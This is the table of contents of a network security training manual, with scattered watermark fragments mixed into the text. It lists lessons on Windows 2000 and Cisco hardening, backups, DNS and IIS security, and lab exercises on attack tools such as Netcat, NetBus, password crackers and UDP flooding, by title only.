Windows 2000 Network Security . . . . . . . . . . . . . . . . . . . . . .298 Task 4G-1 Investigating Printer Spooler Security . . . . . . . . . . . . . . . . . 299 Communicating without NetBIOS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 301 Task 4G-2 Communication without NetBIOS . . . . . . . . . . . . . . . . . . . . 301 NAT and ICS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 303 Remote Access. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 303 RADIUS Implementation in the Classroom . . . . . . . . . . . . . . . . . . . . . . 304 Task 4G-3 Physically Preparing for RADIUS Implementation . . . . . . . . . 304 Configuring the Dialup Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 305 Task 4G-4 Configuring the Dialup Server Configuration . . . . . . . . . . . . . 305 Configuring the Dialup Client . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 307 Task 4G-5 Configuring the Dialup Client . . . . . . . . . . . . . . . . . . . . . . . 307
In
st
PL
IC
AT
iti
on
Topic 4D
Windows 2000 Resource Security . . . . . . . . . . . . . . . . . . . . . .272 Task 4D-1 Compromising NTFS Security . . . . . . . . . . . . . . . . . . . . . . . 275 The NULL Session . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275 Windows 2000 Printer Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 276 Windows 2000 Registry Security. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 276 Default Registry Configurations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 277 Task 4D-2 Setting Registry Permissions . . . . . . . . . . . . . . . . . . . . . . . 278 Registry Backup. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 278 Task 4D-3 Saving Registry Information . . . . . . . . . . . . . . . . . . . . . . . 278 Blocking Access to the Registry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 279 Task 4D-4 Blocking Registry Access . . . . . . . . . . . . . . . . . . . . . . . . . . 279 System Hardening . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 280 Task 4D-5 Removing Unneeded Subsystems . . . . . . . . . . . . . . . . . . . . 283
LESSON 5: ROUTERS AND ACCESS CONTROL LISTS

Topic 5A
Ed
T DU PL IC
Creating Users on the RADIUS Server . . . . . . . . . . . . . . . . . . . . . . . . . . 308 Task 4G-6 Creating Users on the RADIUS Server . . . . . . . . . . . . . . . . . 308 IAS. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 309 Task 4G-7 Installing IAS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 309 RIP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 310 Task 4G-8 Installing RIP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 310 Configuring the Dialup Server as a RADIUS Client . . . . . . . . . . . . . . . . 311 Task 4G-9 Configuring the Dialup Server as a RADIUS Client . . . . . . . . . 311 Testing the Dialup Client. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 312 Task 4G-10 Testing the Dialup Client . . . . . . . . . . . . . . . . . . . . . . . . . . 312 Bringing Back the Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 313 Task 4G-11 Reconfiguring the Network . . . . . . . . . . . . . . . . . . . . . . . . 313 Hardening TCP/IP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 314 Task 4G-12 Configuring TCP/IP in the Registry . . . . . . . . . . . . . . . . . . . 315 TCP/IP Filtering . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 316 Task 4G-13 Configuring Port and Protocol Filtering . . . . . . . . . . . . . . . . 317 Lesson Review 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 318
CONTENTS
Topic 5B
Routing Principles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .334 The ARP Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 334 LAN-to-LAN Routing Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 337 LAN-to-WAN Routing Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 338 Task 5B-1 Performing IP and MAC Analysis . . . . . . . . . . . . . . . . . . . . . 339 The Routing Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 340 Static and Dynamic Routing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 342 Comparing Routed Protocols and Routing Protocols . . . . . . . . . . . . . . 345 The Routing Protocols. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 346 RIP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 350 Task 5B-2 Viewing a RIP Capture . . . . . . . . . . . . . . . . . . . . . . . . . . . 351 RIPv2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 351 Task 5B-3 Viewing a RIPv2 Capture . . . . . . . . . . . . . . . . . . . . . . . . . . 353
st
In
DO
ru ct
NO
Fundamental Cisco Security. . . . . . . . . . . . . . . . . . . . . . . . . . .322 Authentication and Authorization . . . . . . . . . . . . . . . . . . . . . . . . . . . . 325 Configuring Access Passwords. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 325 Task 5A-1 Configuring Passwords . . . . . . . . . . . . . . . . . . . . . . . . . . . 327 Creating User Accounts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 327 Implementing Banners . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 327 Implementing Cisco Banners . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 328 Task 5A-2 Configuring Login Banners . . . . . . . . . . . . . . . . . . . . . . . . 329 SSH Overview. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 330 Router Configuration to use SSH . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 330 Task 5A-3 Configuring SSH on a Router . . . . . . . . . . . . . . . . . . . . . . . 332 Task 5A-4 Configuring the SSH Client . . . . . . . . . . . . . . . . . . . . . . . . 334
or
AT
Contents
E
xi
iti
on
CONTENTS
Topic 5C
Topic 5E Topic 5F
Implementing Access Control Lists . . . . . . . . . . . . . . . . . . . .363 Defending Against Attacks with ACLs. . . . . . . . . . . . . . . . . . . . . . . . . . 367 Task 5E-1 Creating Access Control Lists . . . . . . . . . . . . . . . . . . . . . . . 369
or
DO NO
ru ct
Topic 6A
Continuity and Recovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . .380 Planning for Backups . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 380 Disasters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 380 Security Policies and Their Impact on the Business. . . . . . . . . . . . . . . 382
In
xii
st
Topic 6B
Developing the Plan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .384 Requirements and Goals of a Contingency Plan . . . . . . . . . . . . . . . . . . 384 Creating the Contingency Plan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 385 Testing the Plan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 385 The Technologies of Staying On . . . . . . . . . . . . . . . . . . . . . . .387 Personal UPS Devices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 387 Task 6C-1 Configuring a UPS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 388 Full Server Rack UPS Devices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 389 Building Generators. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 389
Topic 6C
DU
LESSON 6: CONTINGENCY PLANNING
PL
Logging Concepts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .369 Configuring Logging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 371 Task 5F-1 Configuring Buffered Logging . . . . . . . . . . . . . . . . . . . . . . 373 ACL Logging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 374 Task 5F-2 Configuring Anti-spoofing Logging . . . . . . . . . . . . . . . . . . . 376 Lesson Review 5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 377
Ed
Creating Access Control Lists . . . . . . . . . . . . . . . . . . . . . . . . .359 Access Control List Operation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 360 The Access List Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 360 The Wildcard Mask . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 361 Task 5D-1 Creating Wildcard Masks . . . . . . . . . . . . . . . . . . . . . . . . . . 363
IC
AT
iti
Topic 5D
on
Removing Protocols and Services . . . . . . . . . . . . . . . . . . . . . .354 CDP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 354 Task 5C-1 Turning Off CDP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 355 ICMP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 355 Task 5C-2 Hardening ICMP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 356 Source Routing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 356 Small Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 357 Finger . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 357 Remaining Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 358 Task 5C-3 Removing Unneeded Services . . . . . . . . . . . . . . . . . . . . . . . 359
Topic 6D
Backing Up the Operating Systems. . . . . . . . . . . . . . . . . . . . .391 Backup Strategies for Windows Computers. . . . . . . . . . . . . . . . . . . . . . 398 Task 6D-1 Creating a Folder Structure . . . . . . . . . . . . . . . . . . . . . . . . 399 Initiating the Backup Process. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 399 Task 6D-2 Initiating a Normal Backup . . . . . . . . . . . . . . . . . . . . . . . . 400 Viewing the Results of the Backup Process . . . . . . . . . . . . . . . . . . . . . 400 Task 6D-3 Viewing the State of the Archive Attribute Bit . . . . . . . . . . . 401 Restoring a File from Normal Backup . . . . . . . . . . . . . . . . . . . . . . . . . . 401 Task 6D-4 Restoring from a Backup . . . . . . . . . . . . . . . . . . . . . . . . . . 401 Understanding Differential Backup . . . . . . . . . . . . . . . . . . . . . . . . . . . . 402 Task 6D-5 Preparing to Start a Differential Backup Sequence . . . . . . . . 402 Backing Up Your Weekends Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 402 Task 6D-6 Initiating a Differential Backup Sequence . . . . . . . . . . . . . . 403 Adding Data During the Week . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 403 Task 6D-7 Creating Additional Data . . . . . . . . . . . . . . . . . . . . . . . . . . 403 Backing Up Data During the Week . . . . . . . . . . . . . . . . . . . . . . . . . . . . 404 Task 6D-8 Continuing the Differential Backup Sequence . . . . . . . . . . . . 404 Adding More Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 405 Task 6D-9 Adding Data After a Differential Backup . . . . . . . . . . . . . . . 405 Backing Up More Data. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 405 Task 6D-10 Differentially Backing Up More Data . . . . . . . . . . . . . . . . . . 405 Accidentally Deleting Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 406 Task 6D-11 Destroying Backed-up Data . . . . . . . . . . . . . . . . . . . . . . . . 406 Restoring Data from a Differential Backup . . . . . . . . . . . . . . . . . . . . . . 406 Task 6D-12 Restoring Files from a Differential Backup . . . . . . . . . . . . . . 407 Optional Tasks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 408 Understanding Incremental Backup . . . . . . . . . . . . . . . . . . . . . . . . . . . 408 Task 6D-13 Preparing to Start an Incremental Backup Sequence . . . . . . . 408 Backing up Your Weekends Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 409 Task 6D-14 Initiating an Incremental Backup Sequence . . . . . . . . . . . . . 409 Adding Data During the Week . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 409 Task 6D-15 Creating Additional Data . . . . . . . . . . . . . . . . . . . . . . . . . . 410 Backing Up Data During the Week . . . . . . . . . . . . . . . . . . . . . . . . . . . . 410 Task 6D-16 Continuing the Incremental Backup Sequence . . . . . . . . . . . 410 Adding More Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 411 Task 6D-17 Adding Data After an Incremental Backup . . . . . . . . . . . . . . 411 Backing Up More Data. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 411 Task 6D-18 Incrementally Backing Up More Data. . . . . . . . . . . . . . . . . . 412 Accidentally Corrupting Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 412 Task 6D-19 Corrupting Backed-up Data . . . . . . . . . . . . . . . . . . . . . . . . 412 Restoring Data from an Incremental Backup . . . . . . . . . . . . . . . . . . . . 413 Task 6D-20 Restoring an Incrementally Backed-up File. . . . . . . . . . . . . . 413 Performing an Incomplete Restore from Incremental Backup . . . . . . . 413 Task 6D-21 Incompletely Restoring from Incremental Backup . . . . . . . . . 414 Analyzing the Incremental Restore. . . . . . . . . . . . . . . . . . . . . . . . . . . . 415 Task 6D-22 Completely Restoring from Incremental Backup . . . . . . . . . . 415
CONTENTS
Ed
T DU PL IC
st
In
DO
ru ct
NO
or
AT
Contents
E
xiii
iti
on
CONTENTS
Backup Options for Linux Computers . . . . . . . . . . . . . . . . . . . . . . . . . . 415 Task 6D-23 Using the tar Command for Incremental Backups . . . . . . . . . 417 Backup Strategies for Cisco Routers . . . . . . . . . . . . . . . . . . . . . . . . . . . 417 Task 6D-24 Backing Up Cisco Router Configurations . . . . . . . . . . . . . . . 418 Lesson Review 6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 419
LESSON 7: SECURITY ON THE INTERNET AND THE WWW

Topic 7A
or
DO NO
ru ct In
xiv Hardening The Infrastructure (SCP)
st
Topic 7C
Describing Web Hacking Techniques. . . . . . . . . . . . . . . . . . . .441 Vulnerability Scanning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 441 Incorrect Web Design . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 442 Buffer Overflows . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 443
DU
PL
IC
AT
Topic 7B
Identifying the Weak Points of the Internet. . . . . . . . . . . . .428 Targeting the Routers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 429 Targeting the ISPs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 430 Targeting DNS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 430 Task 7B-1 Identifying Weak Points of the Internet . . . . . . . . . . . . . . . 432 DNS Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 432 Configuring DNS for Windows 2000 . . . . . . . . . . . . . . . . . . . . . . . . . . . 433 Task 7B-2 Installing a Standard Primary DNS Server on a Windows 2000 Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 434 Reverse Lookup Zones . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 434 Task 7B-3 Creating Reverse Lookup Zones . . . . . . . . . . . . . . . . . . . . . 435 Forward Lookup Zones. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 435 Task 7B-4 Creating a Forward Lookup Zone . . . . . . . . . . . . . . . . . . . . . 436 Installing DNS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 436 Task 7B-5 Installing DNS Servers . . . . . . . . . . . . . . . . . . . . . . . . . . . 437 Zone Configuration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 437 Task 7B-6 Creating, Viewing, and Deleting Forward and Reverse Lookup Zones . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 438 Standard Secondary DNS Servers. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 439 Task 7B-7 Creating Secondary Zones . . . . . . . . . . . . . . . . . . . . . . . . . 439 Zone Transfers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 440 Task 7B-8 Attempting Blocked Zone Transfers . . . . . . . . . . . . . . . . . . . 440
Ed
Describing the Components of the Internet . . . . . . . . . . . . .422 The Backbone (or Layer 1 of the Internet). . . . . . . . . . . . . . . . . . . . . . 422 Network Service Providers (NSPs) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 423 Long Distance Carriers. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 423 NAPs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 423 ISPs at Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 424 The Organizations that Help Run the Internet (or Layer 8 of the Internet) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 425 DNS Revealed . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 426 Task 7A-1 Defining Internet Components . . . . . . . . . . . . . . . . . . . . . . 428
iti
on
or
DO NO
ru ct
In
st
DU
PL
IC
Contents
AT
E
xv
Topic 7D
Describing Methods Used to Attack Users . . . . . . . . . . . . . . .455 Email Hack Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 455 Cookies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 460 DSL and Cable Modem Vulnerabilities . . . . . . . . . . . . . . . . . . . . . . . . . . 460 Task 7D-1 Identifying User Vulnerabilities and Internet Security Concerns . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 461 Browser Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 461 General Settings for Internet Explorer 6. . . . . . . . . . . . . . . . . . . . . . . . 462 Task 7D-2 Viewing the General Settings for Your Browser . . . . . . . . . . . 462 Advanced Settings for Internet Explorer 6 . . . . . . . . . . . . . . . . . . . . . . 464 Task 7D-3 Viewing the Advanced Settings for Your Browser. . . . . . . . . . 464 Security Settings for Internet Explorer 6 . . . . . . . . . . . . . . . . . . . . . . . 466 Task 7D-4 Viewing the Zone Settings for Your Browser . . . . . . . . . . . . . 466 Default Security Settings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 467 Task 7D-5 Implementing Default Security Levels for Zones . . . . . . . . . . 467 The Low Security Setting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 468 Task 7D-6 Viewing Detailed Settings for the Security Level Low. . . . . . . 468 The High Security Setting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 469 Task 7D-7 Viewing Detailed Settings for the Security Level High . . . . . . 470 The Microsoft Virtual Machine. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 471 Task 7D-8 Viewing the Custom Settings for Microsoft VM (Java Settings). 471 How to Make Best Use of These Zones . . . . . . . . . . . . . . . . . . . . . . . . . 472 Task 7D-9 Adding Sites to a Zone . . . . . . . . . . . . . . . . . . . . . . . . . . . 472 Cookies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 473 Task 7D-10 Viewing Cookie Handling Settings. . . . . . . . . . . . . . . . . . . . 473 Content Ratings. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 473 Task 7D-11 Viewing Content Ratings . . . . . . . . . . . . . . . . . . . . . . . . . . 474
Ed
Task 7C-1 Identifying Web Hacking Techniques . . . . . . . . . . . . . . . . . . 444 Web Server Security. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 444 IIS Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 445 Task 7C-2 Investigating IIS Security . . . . . . . . . . . . . . . . . . . . . . . . . 446 Web Site Configuration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 446 Task 7C-3 Implementing a Web Site . . . . . . . . . . . . . . . . . . . . . . . . . 446 Web Site Maintenance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 448 Task 7C-4 Starting and Stopping the Web Server . . . . . . . . . . . . . . . . . 448 DoS Problems. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 448 Task 7C-5 Controlling Performance Settings . . . . . . . . . . . . . . . . . . . . 449 Web Server Directory Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 449 Task 7C-6 Controlling the Home Directory Settings . . . . . . . . . . . . . . . 449 Web Server Access Controls. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 449 Task 7C-7 Controlling Access Settings . . . . . . . . . . . . . . . . . . . . . . . . 450 Patches and Hot Fixes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 451 Task 7C-8 Using the IIS Lockdown Tool . . . . . . . . . . . . . . . . . . . . . . . 452 Hot-fix Checker . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 452 Task 7C-9 Using the Hot Fix Net Check Tool . . . . . . . . . . . . . . . . . . . . 453 Apache. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 454
CONTENTS
iti
on
CONTENTS
Topic 8A
Topic 8B
ru ct
Topic 8D
Scanning the Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .496 Port Scanning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 496 The netstat Tool . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 497 Service Identification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 497 Task 8D-1 Using nmap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 499 Windows Port Scanners . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 499 Task 8D-2 Using SuperScan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 501 Identifying the Operating System and OS Version . . . . . . . . . . . . . . . . 502 Using nmap to Identify the OS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 505 Task 8D-3 Using nmap to Identify an Operating System . . . . . . . . . . . . 506 Using the nmap Front End . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 506 Task 8D-4 Using nmap Front End . . . . . . . . . . . . . . . . . . . . . . . . . . . 507 Using Nessus to Perform a Scan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 507 Task 8D-5 Installing Nessus for First-time Use . . . . . . . . . . . . . . . . . . 510 Scanning for Vulnerabilities with Nessus . . . . . . . . . . . . . . . . . . . . . . . 510 Task 8D-6 Using Nessus for Vulnerability Scanning . . . . . . . . . . . . . . . 511 Viruses, Worms, and Trojan Horses . . . . . . . . . . . . . . . . . . . . .512 Differentiating Between a Virus and a Worm . . . . . . . . . . . . . . . . . . . . 512
st
In
Topic 8E
xvi Hardening The Infrastructure (SCP)
DO
NO
DU
PL
IC
Topic 8C
Sweeping the Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .492 Ping Sweeping. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 492 Windows Ping Sweepers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 493 Task 8C-1 Using SuperScan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 495
or
AT
Mapping the Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .488 Using Traceroute . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 488 Task 8B-1 Using Windows Tracing Tools . . . . . . . . . . . . . . . . . . . . . . . 489 Using traceroute on Linux. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 489 Using Graphical Tracing Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 489 Task 8B-2 Using VisualRoute . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 491
Ed
Network Reconnaissance . . . . . . . . . . . . . . . . . . . . . . . . . . . . .483 Who is the Target?. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 484 Studying the Message Source . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 486
iti
LESSON 8: ATTACK TECHNIQUES
on
Using Content Ratings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 474 Task 7D-12 Configuring a Browser to Use Content Ratings . . . . . . . . . . . 474 Certificates . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 475 Task 7D-13 Properties of the Certificates Section . . . . . . . . . . . . . . . . . 475 Your Personal Information . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 476 Task 7D-14 Viewing the Handling of Personal Information by a Browser . . 476 Email Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 477 Task 7D-15 Basic Security Settings to Take Care of With Your Email Client. 477 Lesson Review 7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 479
The Trojan Horse . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 513 The SubSeven Trojan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 513 NetBus . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 514 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 516 Task 8E-1 Using NetBus Pro . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 516
CONTENTS
Topic 8F
Malicious Web Sites . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .517 Task 8F-1 Implementing a Malicious Web Site . . . . . . . . . . . . . . . . . . 517 Falling Victim to a Malicious Web Site . . . . . . . . . . . . . . . . . . . . . . . . . 518 Task 8F-2 Visiting a Malicious Web Site . . . . . . . . . . . . . . . . . . . . . . . 518
Topic 8H
Topic 8I
Topic 8J Topic 8K Topic 8L
ru ct
Social Engineering . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .531 Task 8K-1 Discussing Social Engineering Examples . . . . . . . . . . . . . . . . 532 Case Study: Social Engineering . . . . . . . . . . . . . . . . . . . . . . . .532 Task 8L-1 Reviewing the Social Engineering Case Study . . . . . . . . . . . . 535
st
In
Performing a Denial of Service . . . . . . . . . . . . . . . . . . . . . . . .538 Task 8O-1 Flooding with Udpflood . . . . . . . . . . . . . . . . . . . . . . . . . . 539 OOB Exploit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 539 Lesson Review 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 540
DO
Topic 8N Topic 8O
Hiding Evidence of an Attack . . . . . . . . . . . . . . . . . . . . . . . . .538
NO
Topic 8M
Gaining Unauthorized Access . . . . . . . . . . . . . . . . . . . . . . . . .535 GRUB . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 537 Task 8M-1 Investigating the Single User GRUB Loader . . . . . . . . . . . . . 537
DU
PL
IC
Contents
Revealing Hidden Passwords . . . . . . . . . . . . . . . . . . . . . . . . . .529 Task 8J-1 Revealing Hidden Passwords . . . . . . . . . . . . . . . . . . . . . . . 530
or
AT
Cracking Encrypted Passwords . . . . . . . . . . . . . . . . . . . . . . . . .523 Cracking Passwords with L0pht. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 523 Task 8I-1 Using L0pht LC4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 526 Cracking Passwords with John the Ripper . . . . . . . . . . . . . . . . . . . . . . 527 Task 8I-2 Using John the Ripper . . . . . . . . . . . . . . . . . . . . . . . . . . . 527
Ed
Recording Keystrokes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .520 Task 8H-1 Using Software Keystroke Logging . . . . . . . . . . . . . . . . . . . 521 Hardware Keyloggers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 521 Task 8H-2 Using a Keystroke-logging Keyboard . . . . . . . . . . . . . . . . . . 522
E
xvii
iti
Topic 8G
Gaining Control Over the System . . . . . . . . . . . . . . . . . . . . . .519 Task 8G-1 Using Netcat . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 519
on
CONTENTS
APPENDIX A: HARDENING THE INFRASTRUCTURE EXAM OBJECTIVES

Exam Objectives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .543 Glossary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .549 Index. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .567
